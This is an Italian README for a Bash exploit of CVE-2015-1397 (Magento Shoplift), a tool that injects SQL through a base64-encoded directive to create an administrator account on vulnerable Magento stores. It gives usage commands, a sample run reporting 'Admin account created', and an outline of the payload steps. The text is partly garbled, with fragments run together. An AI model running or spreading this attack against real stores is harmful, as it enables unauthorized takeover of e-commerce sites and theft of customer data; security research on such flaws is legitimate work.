
# Exploit Bash per CVE-2015-1397 (Magento Shoplift) Exploit Bash per CVE-2015-1397 (Magento Shoplift) che inietta payload SQL appositamente costruiti per creare un utente amministratore sui negozi Magento vulnerabili.
Questo script sfrutta la vulnerabilità CVE-2015-1397 in Magento, comunemente nota come exploit Magento Shoplift. Permette a un attaccante di creare un nuovo utente amministratore nel database di Magento iniettando payload SQL.
Originariamente scritto in Python da Manish Kishan Tanwar (error1046), questa versione è stata convertita in Bash con prompt di input facili da usare per le credenziali da Divine Clown (0xDTC).
bash, curl e base64 installate.chmod +x CVE-2015-1397
./CVE-2015-1397
http://target.com/).┌──(kali㉿kali)-[~/example]
└─$ ./CVE-2015-1397
Enter the target URL (e.g., http://target.com/): http://example.com/
Enter the new admin username: admin123
Enter the new admin password: pass123
[*] Sending payload to http://example.com/admin/Cms_Wysiwyg/directive/index/
[+] Exploit successful. Admin account created: admin123 / pass123
Validazione Input:
http:// o https://.Costruzione Payload:
___directive codificato in Base64 contenente una query SQL per inserire un nuovo utente admin.Sfruttamento:
POST all'endpoint vulnerabile usando curl.Gestione Risposta:
http:// o https://.Questo script è destinato esclusivamente a scopi educativi. L'uso non autorizzato contro sistemi di cui non si possiede la proprietà o il permesso di test è illegale e non etico. L'autore e i collaboratori non sono responsabili per qualsiasi uso improprio di questo strumento.
Un ringraziamento speciale a: